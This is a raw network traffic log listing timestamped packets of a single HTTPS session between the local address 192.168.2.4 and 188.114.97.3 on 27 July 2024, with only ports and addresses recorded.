Jul 27, 2024 11:01:12.656595945 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.656708956 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.656760931 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.656780958 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.656863928 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.656919956 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.656930923 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.657012939 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.657062054 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.657072067 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.657146931 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.657201052 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.657208920 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.657288074 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.657345057 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.657352924 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.661282063 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.661341906 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.661350012 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.708740950 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.744750023 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.744995117 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.745089054 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.745111942 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.745151997 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.745206118 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.745214939 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.745299101 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.745348930 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.745357990 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.745763063 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.745820045 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.745829105 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.745908976 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.745956898 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.745965958 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.746645927 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.746710062 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.746717930 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.746793985 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.746834993 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.746843100 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.746952057 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.746999979 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.747008085 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.747657061 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.747714996 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.747723103 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.747850895 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.747894049 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.747903109 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.748092890 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.748147011 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.748155117 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.748714924 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.748769999 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.748778105 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.802478075 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.834475040 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.834587097 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.834666014 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.834767103 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.834791899 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.834873915 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.834887981 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.834893942 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.834920883 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.835031986 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.835031986 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.835031986 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.835031986 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.835037947 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.835064888 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.835253954 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.835381985 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.835381985 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.835401058 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.835453987 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.835761070 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.835839033 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.835992098 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.836064100 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.836097002 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.836158991 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.838109016 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.838169098 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.838187933 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.838224888 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.838243961 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.838252068 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.838270903 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.838270903 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.838329077 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.838337898 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.838385105 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.839760065 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.839823961 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.839960098 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.840022087 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.924135923 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.924380064 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.924436092 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.924462080 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.924503088 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.924552917 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.924628019 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.924725056 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.924755096 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.924756050 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.924756050 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.924796104 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.924823046 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.924988985 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.924988985 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.925021887 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.925468922 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.925582886 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.925585985 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.925626993 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.925656080 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.925733089 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.925791979 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.925801992 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.925851107 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.926285028 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.926361084 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.926414967 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.926489115 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.926528931 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.926592112 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.926714897 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.926776886 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.927117109 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.927177906 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.933198929 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.933274031 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.933301926 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.933506966 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.933541059 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.933589935 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.933599949 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.933608055 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.933639050 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.933895111 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.933954000 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.933962107 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.934012890 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.934067011 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.934127092 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.934287071 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.934354067 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.934473991 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.934535980 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.934755087 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.934811115 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.934823036 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.934829950 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.934860945 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.935318947 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.935376883 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.935385942 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.935431004 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:12.935503006 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:12.935559988 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.014477015 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.014580011 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.014925957 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.014956951 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.015330076 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.015372038 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.015676022 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.015707970 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.016088963 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.016129017 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.016273022 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.016273022 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.016288996 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.016988993 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.017025948 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.017066956 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.017076969 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.017095089 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.018371105 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.018408060 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.018448114 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.018457890 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.018474102 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.019454956 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.019491911 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.019527912 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.019536018 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.019552946 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.020421982 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.020462036 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.020495892 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.020507097 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.020534992 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.022841930 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.022881985 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.022922039 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.022931099 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.022945881 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.068042040 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.102571964 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.102634907 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.103071928 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.103101969 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.103174925 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.103224039 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.103475094 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.103475094 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.103475094 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.103507996 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.103687048 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.104438066 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.104509115 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.104527950 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.104546070 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.104577065 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.104597092 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.105334997 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.105375051 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.105413914 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.105422974 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.105454922 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.105473042 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.107228041 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.107268095 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.107307911 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.107316017 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.107347965 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.107367992 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.108618021 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.108668089 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.108711958 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.108720064 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.108753920 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.108777046 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.112376928 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.112417936 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.112498045 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.112498045 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.112529993 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.112610102 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.112850904 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.112903118 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.112941980 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.112951040 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.112983942 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.113001108 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.191941977 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.191972017 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.192053080 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.192070961 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.192120075 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.193003893 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.193047047 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.193085909 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.193094015 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.193135023 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.193159103 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.193922043 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.193972111 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.194000959 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.194010019 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.194044113 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.194066048 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.194771051 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.194812059 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.194845915 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.194854975 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.194885015 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.194902897 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.196012020 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.196053028 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.196088076 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.196095943 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.196130037 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.196152925 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.196962118 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.197010040 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.197040081 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.197047949 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.197071075 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.197093010 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.197851896 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.197892904 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.197916985 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.197925091 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.197957993 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.197982073 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.201400042 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.201441050 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.201483965 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.201492071 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.201525927 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.201549053 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.281877041 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.281941891 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.282089949 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.282099962 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.282149076 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.283241034 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.283289909 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.283349991 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.283359051 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.283412933 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.285593987 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.285634995 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.285672903 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.285681009 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.285700083 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.285727024 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.287409067 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.287455082 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.287492990 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.287502050 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.287533045 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.287552118 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.288408995 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.288448095 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.288497925 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.288505077 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.288527012 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.288551092 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.289288044 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.289328098 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.289361954 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.289369106 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.289400101 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.289423943 CEST	49732	443	192.168.2.4	188.114.97.3
Jul 27, 2024 11:01:13.289613962 CEST	443	49732	188.114.97.3	192.168.2.4
Jul 27, 2024 11:01:13.289668083 CEST	443	49732	188.114.97.3	192.168.2.4
